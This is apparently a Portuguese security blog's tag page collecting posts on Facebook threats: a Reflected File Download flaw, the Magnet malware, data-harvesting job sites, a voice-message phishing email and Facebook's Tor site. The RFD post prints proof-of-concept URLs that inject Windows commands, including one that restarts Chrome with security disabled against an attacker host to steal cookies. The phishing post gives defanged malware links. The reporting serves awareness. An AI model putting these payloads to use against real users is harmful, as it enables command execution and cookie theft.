Todos os posts tagados facebook

Facebook vulnerável a uma falha grave

facebook

A maior rede social do planeta está vulnerável a uma falha RFDReflected File Download – que permite a um utilizador malicioso obter controlo do sistema operativo da vítima. Com este tipo de vulnerabilidade, divulgada por Oren Hafif em Outubro de 2014, um utilizador pode enviar um link malicioso para um dominio confiável [neste caso o Facebook.com] e forçar um download nesse dominio confiável. Depois de executado, o utilizador malicioso pode executar qualquer comando do sistema operativo com o nível de permissão atual do utilizador [mais uma razão para que não navegue na web como administrador].

Mohamed Ramadan testou esta falha no Facebook e conseguiu replicar um RFD.
Os testes de demonstração da falha do Mohamed conseguem abrir a calculadora do Windows[1], o Paint[2] e num último exemplo, fechar o browser Chrome e reiniciá-lo com o modo segurança inativo para roubar os cookies do utilizador[3].

[1] https://api.facebook.com/method/update.bat?q=AttackSecure%22;||calc||&format=json

[2] https://api.facebook.com/method/update.bat?q=AttackSecure%22;||mspaint||&format=json

[3] https://api.facebook.com/method/Update.cmd?q=UpdateChrome%22;||taskkill /F /IM ch*|md||start chrome http://attacker-secure.com/ –disable-web-security –disable-popup-blocking||&format=json

fb-rfd-2

O autor desta descoberta testou todos estes exemplos no Windows 7 com o Internet Explorer 9, embora refira que também é possível executar com o Firefox, Chrome e Opera.

Fica aqui referência também ao vídeo que demonstra esta falha:

Pessoalmente experimentei com o IE8 e o IE11 e não foi possível executar o ataque. No entanto, com o IE9 no Windows Vista e Windows 7 correu o ataque sem problema.

Segundo a site do Mohamed, a resposta do Facebook a esta vulnerabilidade foi a seguinte:

Thanks for your report. This is a technique that has been reported before. It’s not fully fixable at present, at least for the general case, but we’re looking into ways to rectify it globally going forward. For now it’s a known risk and not eligible for a bug bounty reward. We do have mechanisms in place to monitor and mitigate abuse.

Isto é um grande risco de segurança para os todos utilizadores desta rede social. Fica a dica de verificarem sempre os links que vos enviam. Será uma questão de tempo até que utilizadores maliciosos comecem a usar este tipo de vulnerabilidade para propagar malware.

Magnet – um novo malware no Facebook

facebook

Um novo malware, descoberto por Mohammad Faghani e intitulado de Magnet, está a propagar-se pelo Facebook utilizando um suposto vídeo pornográfico e com mensagens apelativas. A ideia é que, os utilizadores desta rede social mais curiosos, cliquem no suposto vídeo.

Em apenas dois dias, este malware infetou mais de 100.000 utilizadores. Este número deverá aumentar nos próximos dias.

Ao clicar no link que acompanha o post de Facebook, assim que o utilizador começa a ver um vídeo, é reencaminhado para uma instalação de uma falsa atualização do Adobe Flash Player.
Já reparei que a imagem erótica que acompanha este conteúdo malicioso vai sendo modificada e por isso a minha recomendação é simplesmente não clicar nestes links.

Embora o Facebook tenha sistema automatizados para prevenir ligações maliciosos se propaguem pela rede, muitas conseguem ultrapassar este tipo de proteção e infetar milhares de utilizadores curiosos.

Instalei o malware num ambiente controlado e reparei que, após a instalação da suposta atualização do Flash [extensão para o browser], o Magnet partilha no Facebook o link malicioso e identifica 20 amigos na rede social. Também gosta de uma ligação duma página de Facebook e pelos vistos, já são bastantes os likes.

facebook_malware

O Magnet aparenta ter um um sistema keylogger [monitoriza rato e teclado] e aceita comandos C&C [command & control].

Faghani acrescenta que este malware atualiza-se automaticamente com novos padrões de ataque e bloqueia diversos tipos de proteção contra estas ameaças.

Uma nova variante deste malware, força a vítima também a seguir uma conta no Twitter.

Quem quiser acompanhar o desenvolvimento deste malware pode fazê-lo seguinte a sua assinatura MD5: https://malwr.com/analysis/ZDkyZWIwZGI4YjA2NGNiZjk4MDRlMmMzZmNjN2Y4YjA/.
Saliento que o pacote PT-pt está incluído neste malware, e como se pode ver no mapa, Portugal está entre os muito infetados com o Magnet.

fbmalheatmap

Relatório completo do Mohammad Faghani – http://www.faghani.info/report.txt

E se alguns motores de emprego vendessem a sua informação?

procura_emprego

Baseado na experiência de alguns utilizadores do WebSegura.net e com uma amostra de 3 sites de motores de emprego, decidi escrever sobre os perigos que um utilizador corre ao inscrever-se em determinados motores de emprego [agregadores de ofertas de emprego] duvidosos.

Os três motores da amostra apostam em publicidade paga no Facebook para garantir mais visibilidade e Gostos para as suas páginas.

motor_emprego01
Um destes motores, chamou-me particularmente a atenção porque, segundo os mesmos – garantem taxas de empregabilidade superiores a 96% [irrealista não?].

motor_emprego02

A maioria requisita informação pessoal, tal como:

  • Nome
  • Apelido
  • Data de Nascimento
  • Código Postal [com esta informação conseguem localidade]
  • Email
  • Telefone

Outros pedem um pouco mais de informação, prometendo gerar um Curriculum Vitae online.

Um dos portais que tive conhecimento esteve mesmo à venda em 2011 num fórum de discussão português. Vendiam o pacote completo, ou seja, página de Facebook já com alguns Gostos, alojamento e domínio. O software era criado de raiz, sem a utilização de qualquer CMS e conseguia receber automaticamente ofertas de emprego de diversas fontes. Provavelmente conseguiram vender pois a página de Facebook associada ao domínio já é outra e conta com milhares de Gostos.

De referir que dois deles oferecem no ato de registo de utilizador, a possibilidade de assinar um bónus em casinos online.

Alguns relatos de desempregados que tive acesso, divulgaram que ao assinar estes portais receberam de imediato SMS publicitárias [algumas de serviços de valor acrescentado], campanhas de marketing de diversas marcas, promoções de cursos de formação profissional, etc.
Relativamente ao prometido, e baseado novamente na informação de alguns utilizadores que me contataram, as ofertas de emprego nunca realmente chegaram.

Alegadamente estes motores servem apenas para obter dados de utilizadores para construção de base de dados de emails para posteriores campanhas de marketing e programas de afiliados. Este aproveitamento dos portugueses desempregados é imoral e não sei até que ponto será legal este tipo de atividade.

O que realmente me chamou atenção é que, alguns destes portais têm ligações a grandes empresas nacionais de marketing. Algumas delas, no topo das empresas que mais cresceram nos últimos anos em TI.

Um registo numa base de dados para campanhas de marketing, o valor por email no mercado varia entre 4 a 10 cêntimos, no entanto no mercado negro esse valor baixa para valores de 1 cêntimo ou menos. A venda de base de dados é muito comum e na grande maioria das vezes é vendida às margens da lei.

Fica uma mensagem para todos os desempregados leitores do WebSegura.net: inscrevam-se apenas nos portais mais populares – IEFP. Maior parte dos supostos motores de emprego apenas vão replicar ofertas dos sites mais populares. Noutros locais, os vossos dados poderão estar a ser utilizados e vendidos sem o vosso consentimento.

Já recebeu hoje esta mensagem do Facebook?

facebook_voz

Alegadas mensagens de voz vindas do Facebook estão a encher as caixas de email de muitos utilizadores portugueses.
O assunto destes emails é sempre o mesmo – MENSAGEM DE NATAL e têm todos o aspeto de uma mensagem do Facebook.

O texto que acompanha o corpo do email é o seguinte:

Você recebeu um comentário de Voz em sua foto
Gravação: Para ouvir o AUDIO comentário basta clicar em Ouvir Voz comentário.
O conteúdo gravado é de responsabilidade do usuário.

O link que acompanha este email é malicioso e está alojado em hxxp://facebook-audio.cloudapp.net/audio.php. Este script PHP reencaminha para um download:
hxxp://w479565.blob4.ge.tt/streams/7WvtE272/audiovoz.zip?sig=-UpYSXaFhlWa881FTPsCW0xL3jKcoBHH480&type=download

Deve eliminar esta mensagem e, caso tenha clicado no link, correr o seu antivirus imediatamente.

Facebook agora também disponível no Tor

facebook

O rede social Facebook anunciou hoje que já tem disponível uma versão para os utilizadores do Tor:

https://facebookcorewwwi.onion/

Desta forma, os utilizadores do Facebook que queiram utilizar o Tor para manter a sua navegação anónima já poderão fazê-lo neste momento.

O endereço onion do Facebook, acedido apenas via Tor, conecta os utilizadores à infra-estrutra www do Facebook de modo a proporcionar a comunicação direta do utilizador com o datacenter do Facebook. Isto permite sessões de navegação privadas e seguras. Posteriormente, um certificado SSL fornecido pelo Facebook aos utilizadores confirma que o destino é o correto.

Mais uma vez, juntamente com a disponibilização do Osquery, o Facebook confirma uma preocupação com a segurança dos seus utilizadores.